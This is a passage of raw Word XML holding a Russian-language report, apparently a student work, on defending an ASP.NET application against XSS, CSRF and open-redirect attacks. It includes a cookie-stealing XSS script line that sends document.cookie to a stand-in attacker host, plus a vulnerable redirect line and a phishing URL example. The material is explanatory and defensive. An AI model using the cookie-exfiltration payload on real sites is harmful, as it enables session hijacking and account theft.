          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>'https://verybadcoolhacker.com/?cookie='</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>encodeURIComponent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6509A280" w14:textId="04DF2BD3" w:rsidR="0042767C" w:rsidRDefault="0042767C" w:rsidP="0042767C">
      <w:r>
        <w:t xml:space="preserve">Таким образом куки с атакуемого сайта передаются на какой-то ресурс злоумышленника. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A0E6CB" w14:textId="40C219CD" w:rsidR="0042767C" w:rsidRDefault="0042767C" w:rsidP="0042767C">
      <w:r>
        <w:t xml:space="preserve">Для противодействия </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="0042767C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0042608C">
        <w:t>использована</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> фильтраци</w:t>
      </w:r>
      <w:r w:rsidR="0042608C">
        <w:t>я</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> входных данных регулярными выражениями. По умолчанию в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Razor</w:t>
      </w:r>
      <w:r w:rsidRPr="0042767C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pages</w:t>
      </w:r>
      <w:r w:rsidRPr="0042767C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">используется защита от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="0042767C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">путём </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>энкодирования</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>входых</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> данных, таким образом </w:t>
      </w:r>
      <w:r w:rsidR="002C09BA">
        <w:t>все служебные символы по типу «</w:t>
      </w:r>
      <w:r w:rsidR="002C09BA" w:rsidRPr="002C09BA">
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidR="002C09BA">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="002C09BA" w:rsidRPr="002C09BA">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002C09BA">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="002C09BA" w:rsidRPr="002C09BA">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="002C09BA">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="002C09BA" w:rsidRPr="002C09BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C09BA">
        <w:t>не будут обработаны сервером.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C72DB5A" w14:textId="0B66F4AC" w:rsidR="002C09BA" w:rsidRDefault="002C09BA" w:rsidP="002C09BA">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="222222"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cross</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Site</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Request</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Forgery</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t xml:space="preserve">) – </w:t>
      </w:r>
      <w:r>
        <w:t>тип</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>атаки</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>при</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>котором</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>вредоносный сайт, на который заходит пользователь</w:t>
      </w:r>
      <w:r w:rsidR="00CB576D">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отправляет запросы на другой (атакуемый) ресурс, посредством чего происходит кража </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">данных. </w:t>
      </w:r>
      <w:r w:rsidR="00CB576D">
        <w:t>Чтобы и</w:t>
      </w:r>
      <w:r>
        <w:t>збежать этой атаки</w:t>
      </w:r>
      <w:r w:rsidR="00CB576D">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB576D">
        <w:t>предлагается</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>хэлпер</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>@Html.AntiForgeryToken(),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t xml:space="preserve">добавленный во View, и добавленный перед </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C09BA">
        <w:t>action</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-действием</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t xml:space="preserve"> контроллера атрибут</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>ValidateAntiForgeryToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A1170">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3BEEAB" w14:textId="7E990447" w:rsidR="002C09BA" w:rsidRDefault="002C09BA" w:rsidP="002C09BA">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Open</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC68C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC68C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC68C3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Такой</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>вид атаки может быть применен, когда на сервере исполняется следующий код:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F461513" w14:textId="2FB36D5F" w:rsidR="002C09BA" w:rsidRDefault="002C09BA" w:rsidP="004A1170">
      <w:pPr>
        <w:pStyle w:val="22"/>
        <w:ind w:left="0" w:firstLine="708"/>
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Response</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Redirect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Request</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QueryString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117798F3" w14:textId="7A3D4A5A" w:rsidR="002C09BA" w:rsidRDefault="002C09BA" w:rsidP="002C09BA">
      <w:r>
        <w:t xml:space="preserve">Атакующий может добавить ссылку на свой сайт, а пользователь, увидев, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="002C09BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>начинается с хорошего сайта может не рассмотреть адрес полностью, попавшись на фишинговую ссылку:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5A4CFE" w14:textId="73185F51" w:rsidR="002C09BA" w:rsidRDefault="00B93EC6" w:rsidP="004A1170">
      <w:pPr>
        <w:pStyle w:val="22"/>
        <w:ind w:left="0" w:firstLine="708"/>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId67" w:history="1">
        <w:r w:rsidR="004A1170" w:rsidRPr="001B5349">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="23"/>
            <w:szCs w:val="23"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          </w:rPr>
          <w:t>http://www.goodwebsite.com/Redirect?url=http://www.badwebsite.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2388A816" w14:textId="22CA5352" w:rsidR="002C09BA" w:rsidRDefault="002C09BA" w:rsidP="002C09BA">
      <w:r>
        <w:t>На веб сайте злоумышленника может быть такой же интерфейс, как и на атакуемом сайте, и пользователь, подумав</w:t>
      </w:r>
      <w:r w:rsidR="0042608C">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> что он случайно вышел из аккаунта, введет свои логин и пароль на сайте злоумышленника, затем хакерский сайт перенаправит пользователя обратно на атакуемый сайт. Для противодействия такой атаке использова</w:t>
      </w:r>
      <w:r w:rsidR="0042608C">
        <w:t>н</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> следующий код:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2B5C4F" w14:textId="77777777" w:rsidR="002C09BA" w:rsidRPr="001F04F3" w:rsidRDefault="002C09BA" w:rsidP="002C09BA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ActionResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C09BA">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>RedirectToLocalPage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F04F3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
